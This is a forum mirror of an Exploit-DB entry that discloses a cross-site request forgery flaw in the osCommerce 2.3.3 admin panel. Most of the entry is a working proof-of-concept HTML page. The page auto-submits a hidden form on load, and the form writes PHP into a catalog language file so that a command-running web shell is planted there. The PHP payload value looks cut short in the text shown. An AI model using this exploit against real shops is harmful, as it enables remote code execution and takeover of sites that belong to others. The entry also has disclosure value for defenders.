- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38309
- Проверка EDB
-
- Пройдено
- Автор
- JAKUB GALCZYK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2013-02-12
osCommerce - Cross-Site Request Forgery
Код:
source: https://www.securityfocus.com/bid/57892/info
osCommerce is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
osCommerce 2.3.3 is vulnerable; other versions may also be affected.
The following example data is available:
<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://www.example.com/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="<?php $cmd">
</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>
- Источник
- www.exploit-db.com